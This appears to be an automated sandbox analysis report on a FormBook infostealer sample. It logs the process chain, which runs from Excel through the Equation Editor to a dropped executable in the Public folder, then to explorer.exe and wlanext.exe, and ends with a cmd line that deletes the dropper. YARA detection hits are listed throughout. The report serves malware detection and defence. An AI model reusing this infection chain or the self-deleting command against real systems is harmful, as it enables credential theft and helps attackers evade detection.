                                                                                                                                                          Content-Length: 2457
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:07:56 GMT
                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:20:05:50
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13f7a0000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:10
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:11
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                          File size:913408 bytes
                                                                                                                                                          MD5 hash:F49E0B01E26E5E197421C4260DD87545
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2157316080.000000000239D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:13
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                          File size:913408 bytes
                                                                                                                                                          MD5 hash:F49E0B01E26E5E197421C4260DD87545
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:14
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:31
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                          Imagebase:0x3e0000
                                                                                                                                                          File size:77312 bytes
                                                                                                                                                          MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:20:06:35
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a450000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >